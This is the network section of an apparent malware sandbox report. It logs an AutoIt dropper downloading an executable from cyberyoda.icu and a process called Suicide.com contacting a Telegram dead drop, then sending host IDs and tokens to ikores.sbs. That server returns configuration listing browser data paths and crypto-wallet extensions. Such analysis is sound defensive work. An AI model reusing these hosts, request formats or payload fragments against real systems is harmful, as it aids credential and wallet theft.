Dec 5, 2024 21:51:49.723392963 CET	53	56793	1.1.1.1	192.168.2.5
Dec 5, 2024 21:51:49.723634958 CET	53	53891	1.1.1.1	192.168.2.5
Dec 5, 2024 21:51:52.264606953 CET	53	54805	1.1.1.1	192.168.2.5
Dec 5, 2024 21:51:54.463758945 CET	53	53527	1.1.1.1	192.168.2.5
Dec 5, 2024 21:52:04.852989912 CET	59479	53	192.168.2.5	1.1.1.1
Dec 5, 2024 21:52:04.853148937 CET	60842	53	192.168.2.5	1.1.1.1
Dec 5, 2024 21:52:05.100600004 CET	53	60842	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 5, 2024 21:50:09.734081030 CET	192.168.2.5	1.1.1.1	0xd211	Standard query (0)	cyberyoda.icu	A (IP address)	IN (0x0001)	false
Dec 5, 2024 21:50:20.314286947 CET	192.168.2.5	1.1.1.1	0x896	Standard query (0)	LsPLJakEeBsUGsRzAQLUPOMOxfXyb.LsPLJakEeBsUGsRzAQLUPOMOxfXyb	A (IP address)	IN (0x0001)	false
Dec 5, 2024 21:51:31.802517891 CET	192.168.2.5	1.1.1.1	0x268d	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Dec 5, 2024 21:51:33.894850016 CET	192.168.2.5	1.1.1.1	0x10e1	Standard query (0)	ikores.sbs	A (IP address)	IN (0x0001)	false
Dec 5, 2024 21:51:49.585853100 CET	192.168.2.5	1.1.1.1	0xc67	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 5, 2024 21:51:49.586035967 CET	192.168.2.5	1.1.1.1	0x5a1c	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 5, 2024 21:52:04.852989912 CET	192.168.2.5	1.1.1.1	0x2986	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Dec 5, 2024 21:52:04.853148937 CET	192.168.2.5	1.1.1.1	0xda3e	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 5, 2024 21:50:10.552084923 CET	1.1.1.1	192.168.2.5	0xd211	No error (0)	cyberyoda.icu		45.130.41.93	A (IP address)	IN (0x0001)	false
Dec 5, 2024 21:50:20.548260927 CET	1.1.1.1	192.168.2.5	0x896	Name error (3)	LsPLJakEeBsUGsRzAQLUPOMOxfXyb.LsPLJakEeBsUGsRzAQLUPOMOxfXyb	none	none	A (IP address)	IN (0x0001)	false
Dec 5, 2024 21:51:31.941312075 CET	1.1.1.1	192.168.2.5	0x268d	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Dec 5, 2024 21:51:34.216054916 CET	1.1.1.1	192.168.2.5	0x10e1	No error (0)	ikores.sbs		5.75.212.196	A (IP address)	IN (0x0001)	false
Dec 5, 2024 21:51:49.723392963 CET	1.1.1.1	192.168.2.5	0xc67	No error (0)	www.google.com		142.250.181.100	A (IP address)	IN (0x0001)	false
Dec 5, 2024 21:51:49.723634958 CET	1.1.1.1	192.168.2.5	0x5a1c	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 5, 2024 21:52:05.100600004 CET	1.1.1.1	192.168.2.5	0xda3e	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 5, 2024 21:52:05.183001041 CET	1.1.1.1	192.168.2.5	0x2986	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 5, 2024 21:52:05.352380991 CET	1.1.1.1	192.168.2.5	0x4f97	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 5, 2024 21:52:05.365098000 CET	1.1.1.1	192.168.2.5	0x886a	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 5, 2024 21:52:05.365098000 CET	1.1.1.1	192.168.2.5	0x886a	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

ikores.sbs

www.google.com

cyberyoda.icu

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49710	45.130.41.93	80	5540	C:\Users\Public\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 21:50:10.896989107 CET	66	OUT	GET /lem.exe HTTP/1.1 User-Agent: AutoIt Host: cyberyoda.icu
Dec 5, 2024 21:50:12.116749048 CET	1236	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Thu, 05 Dec 2024 20:50:11 GMT Content-Type: application/octet-stream Content-Length: 1192690 Last-Modified: Thu, 05 Dec 2024 16:19:35 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "6751d297-1232f2" Expires: Sat, 04 Jan 2025 20:50:11 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 8a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 30 10 00 00 04 00 00 a0 08 12 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8@0@@RR`.textrt `.rdatan+,x@@.data+@.ndata.rsrc@@.reloc @B
Dec 5, 2024 21:50:12.116806984 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: U\}t+}FEuHGHPuuu@KSV5GWEPu
Dec 5, 2024 21:50:12.116817951 CET	1236	IN	Data Raw: 08 ff 15 90 92 40 00 83 65 f4 00 89 45 0c 8d 45 e4 50 ff 75 08 ff 15 94 92 40 00 8b 7d f0 83 65 f0 00 8b 1d 44 90 40 00 e9 89 00 00 00 0f b6 46 52 0f b6 56 56 0f af 55 e8 8b cf 2b 4d e8 0f af c1 03 c2 99 f7 ff 89 4d 10 0f b6 c0 c1 e0 08 89 45 14 Data Ascii: @eEEPu@}eD@FRVVU+MMEFQNUMMVTUFPEEPMH@EPEEPu@uE9}n~Xtev4L@EtU}jWEEP@vXW
Dec 5, 2024 21:50:12.116947889 CET	1236	IN	Data Raw: 47 00 ff 75 0c ff 75 08 ff d0 eb 0c ff 75 fc ff 15 08 90 40 00 33 c0 40 5f 5e 5b c9 c2 0c 00 39 1d 90 eb 47 00 75 ee ff 75 0c ff 75 08 ff 15 0c 90 40 00 85 c0 75 de eb df 55 8b ec a1 e4 c0 40 00 8b 40 04 56 85 c0 74 04 8b f0 eb 0c 8b 35 64 eb 47 Data Ascii: Guuu@3@_^[9Guuu@uU@@Vt5dGEPGEPjj"PV@#E^]UGSVuWjY}UMi@i@EGE@E3]G$0@Rh@L
Dec 5, 2024 21:50:12.116961956 CET	1236	IN	Data Raw: c7 45 fc 01 00 00 00 66 89 06 e9 e6 16 00 00 6a ef e8 58 fa ff ff 50 56 e8 a0 44 00 00 85 c0 0f 85 d0 16 00 00 c7 45 fc 01 00 00 00 e9 c4 16 00 00 6a 31 e8 36 fa ff ff 8b f0 8b 45 d4 8b c8 c1 f8 03 56 83 e0 02 83 e1 07 50 51 68 d8 9b 40 00 89 75 Data Ascii: EfjXPVDEj16EVPQh@uMHVBV@tVEhpMVEPLPEVE@A}\|1VoH3;tMQPd@E#@E9]uVC3}@Ph@VCE
Dec 5, 2024 21:50:12.116974115 CET	1236	IN	Data Raw: 3b c3 74 5e 48 3b fb 74 0a 8b 3f 3b c3 75 f5 3b fb 75 22 ff 75 dc 68 f4 99 40 00 e8 ed 43 00 00 59 59 68 10 00 20 00 6a e8 53 e8 40 49 00 00 50 e9 45 fd ff ff 83 c7 04 57 be e8 c0 40 00 56 e8 2f 41 00 00 a1 e0 c0 40 00 83 c0 04 50 57 e8 20 41 00 Data Ascii: ;t^H;t?;u;u"uh@CYYh jS@IPEW@V/A@PW A@VP';t+;uh@CYGPV@@W4h@j@$@uFPH@5@cjYjYEEEtj3EEtjDE
Dec 5, 2024 21:50:12.116986990 CET	1236	IN	Data Raw: f0 ff ff 68 04 20 00 00 8b f8 56 57 e8 7d 4e 00 00 83 c4 0c 85 c0 75 07 c7 45 fc 01 00 00 00 56 57 68 f0 97 40 00 e9 c5 f7 ff ff 6a 11 e8 94 f0 ff ff 68 04 20 00 00 8b f8 56 57 e8 c0 4e 00 00 83 c4 0c 85 c0 75 07 c7 45 fc 01 00 00 00 56 57 68 ac Data Ascii: h VW}NuEVWh@jh VWNuEVWh@E9GjRjIE9]tW4@E;ujSW8@E;uuH?;t=]9]tutBE9h@h@hGh u
Dec 5, 2024 21:50:12.117280006 CET	1236	IN	Data Raw: e8 2e ec ff ff 89 45 ec 39 5d ec 0f 84 68 08 00 00 e9 93 f1 ff ff 3b d3 74 04 8b fa eb 0c 8b 3d 64 eb 47 00 81 c7 01 00 00 80 8b 45 e4 89 45 f0 8b 45 e8 6a 02 89 45 ec e8 b5 eb ff ff 6a 11 89 45 f4 e8 ab eb ff ff 57 89 45 08 e8 32 39 00 00 59 53 Data Ascii: .E9]h;t=dGEEEjEjEWE29YSEEPGSPSSSu3FWu@]@A9uuBj#`WI7WuDuEu9uuh@9h@9j^9uu'jYPu@AuuuhH@
Dec 5, 2024 21:50:12.117300034 CET	776	IN	Data Raw: 5d e0 75 30 66 83 7d cc 0d 74 32 66 83 7d cc 0a 74 2b 66 8b 45 08 0f b7 c8 66 89 04 77 46 89 4d cc 66 3b c3 0f 84 15 ff ff ff 3b 75 f8 7c aa e9 0b ff ff ff 0f b7 45 08 e9 c8 fe ff ff 66 8b 45 08 66 39 45 cc 74 14 66 83 f8 0d 0f 84 d5 fe ff ff 66 Data Ascii: ]u0f}t2f}t+fEfwFMf;;u\|EfEf9EtffjSjf97uSjYPV1P`@9]PWf9V1Pd@f9TPW1Ph@+j=TQPl@u
Dec 5, 2024 21:50:12.117311954 CET	1236	IN	Data Raw: 00 00 00 33 c9 e8 f6 e3 ff ff 83 f8 20 0f 83 ba e9 ff ff 39 5d e0 74 1f 39 5d dc 74 0f 50 e8 3d e2 ff ff 53 53 e8 88 e1 ff ff eb 71 53 e8 79 e2 ff ff e9 52 fd ff ff 39 5d dc 74 12 8b 4d d8 8b 15 bc ea 47 00 89 8c 82 94 00 00 00 eb 4f 8b 0d bc ea Data Ascii: 3 9]t9]tP=SSqSyR9]tMGOGW7:FS#Pju@9]t!SSu@jP2PV.EhG3_^[I@@<@P@r@@@B@n@@@@@6@@b@
Dec 5, 2024 21:50:12.236689091 CET	1236	IN	Data Raw: fc 29 75 f8 89 45 f4 83 7d ec 01 0f 85 39 ff ff ff eb 37 39 45 14 0f 8f 02 ff ff ff eb 2c 6a fc e9 99 fe ff ff 6a fe e9 92 fe ff ff 3b df 74 62 39 75 14 7d 03 8b 75 14 56 53 e8 dd fd ff ff 85 c0 0f 84 75 fe ff ff 89 75 fc 8b 45 fc 5f 5e 5b c9 c2 Data Ascii: )uE}979E,jj;tb9u}uVSuuE_^[u9u}uVpBSIWEPVSuT@t;uuu)u9}U(SV3W]]@h NVSG@jhV(}=@u@

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49877	149.154.167.99	443	4708	C:\Users\user\AppData\Local\Temp\402438\Suicide.com

Timestamp	Bytes transferred	Direction	Data
2024-12-05 20:51:33 UTC	85	OUT	GET /m3wm0w HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-12-05 20:51:33 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 05 Dec 2024 20:51:33 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12295 Connection: close Set-Cookie: stel_ssid=09f10682b6fef3d439_7638469492393706909; expires=Fri, 06 Dec 2024 20:51:33 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-12-05 20:51:33 UTC	12295	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 33 77 6d 30 77 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m3wm0w</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49883	5.75.212.196	443	4708	C:\Users\user\AppData\Local\Temp\402438\Suicide.com

Timestamp	Bytes transferred	Direction	Data
2024-12-05 20:51:36 UTC	225	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: ikores.sbs Connection: Keep-Alive Cache-Control: no-cache
2024-12-05 20:51:36 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Dec 2024 20:51:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-05 20:51:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49890	5.75.212.196	443	4708	C:\Users\user\AppData\Local\Temp\402438\Suicide.com

Timestamp	Bytes transferred	Direction	Data
2024-12-05 20:51:38 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----NGDT0R9H4EU37QIMYMGV User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: ikores.sbs Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-12-05 20:51:38 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 46 30 44 39 39 35 43 33 31 36 32 32 33 35 37 33 34 35 32 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 47 56 2d 2d 0d Data Ascii: ------NGDT0R9H4EU37QIMYMGVContent-Disposition: form-data; name="hwid"F0F0D995C3162235734526-a33c7340-61ca------NGDT0R9H4EU37QIMYMGVContent-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------NGDT0R9H4EU37QIMYMGV--
2024-12-05 20:51:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Dec 2024 20:51:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-05 20:51:38 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 61 39 35 37 62 32 31 39 37 63 63 66 32 37 64 37 63 38 66 34 38 61 37 32 63 37 39 61 66 63 64 38 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|a957b2197ccf27d7c8f48a72c79afcd8\|1\|0\|1\|1\|0\|50000\|00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49896	5.75.212.196	443	4708	C:\Users\user\AppData\Local\Temp\402438\Suicide.com

Timestamp	Bytes transferred	Direction	Data
2024-12-05 20:51:40 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GLXT00RQQ9RIM7GDB168 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: ikores.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-05 20:51:40 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 4c 58 54 30 30 52 51 51 39 52 49 4d 37 47 44 42 31 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 35 37 62 32 31 39 37 63 63 66 32 37 64 37 63 38 66 34 38 61 37 32 63 37 39 61 66 63 64 38 0d 0a 2d 2d 2d 2d 2d 2d 47 4c 58 54 30 30 52 51 51 39 52 49 4d 37 47 44 42 31 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 47 4c 58 54 30 30 52 51 51 39 52 49 4d 37 47 44 42 31 36 38 0d 0a 43 6f 6e 74 Data Ascii: ------GLXT00RQQ9RIM7GDB168Content-Disposition: form-data; name="token"a957b2197ccf27d7c8f48a72c79afcd8------GLXT00RQQ9RIM7GDB168Content-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------GLXT00RQQ9RIM7GDB168Cont
2024-12-05 20:51:41 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Dec 2024 20:51:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-05 20:51:41 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49903	5.75.212.196	443	4708	C:\Users\user\AppData\Local\Temp\402438\Suicide.com

Timestamp	Bytes transferred	Direction	Data
2024-12-05 20:51:42 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----1V3WLNGD26F3EU3W4O8G User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: ikores.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-05 20:51:42 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 35 37 62 32 31 39 37 63 63 66 32 37 64 37 63 38 66 34 38 61 37 32 63 37 39 61 66 63 64 38 0d 0a 2d 2d 2d 2d 2d 2d 31 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 31 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 0d 0a 43 6f 6e 74 Data Ascii: ------1V3WLNGD26F3EU3W4O8GContent-Disposition: form-data; name="token"a957b2197ccf27d7c8f48a72c79afcd8------1V3WLNGD26F3EU3W4O8GContent-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------1V3WLNGD26F3EU3W4O8GCont
2024-12-05 20:51:43 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Dec 2024 20:51:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-05 20:51:43 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49909	5.75.212.196	443	4708	C:\Users\user\AppData\Local\Temp\402438\Suicide.com

Timestamp	Bytes transferred	Direction	Data
2024-12-05 20:51:45 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----O8GVA1VKF37YU3OPP8GD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: ikores.sbs Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-12-05 20:51:45 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 38 47 56 41 31 56 4b 46 33 37 59 55 33 4f 50 50 38 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 35 37 62 32 31 39 37 63 63 66 32 37 64 37 63 38 66 34 38 61 37 32 63 37 39 61 66 63 64 38 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 47 56 41 31 56 4b 46 33 37 59 55 33 4f 50 50 38 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 47 56 41 31 56 4b 46 33 37 59 55 33 4f 50 50 38 47 44 0d 0a 43 6f 6e 74 Data Ascii: ------O8GVA1VKF37YU3OPP8GDContent-Disposition: form-data; name="token"a957b2197ccf27d7c8f48a72c79afcd8------O8GVA1VKF37YU3OPP8GDContent-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------O8GVA1VKF37YU3OPP8GDCont
2024-12-05 20:51:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Dec 2024 20:51:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
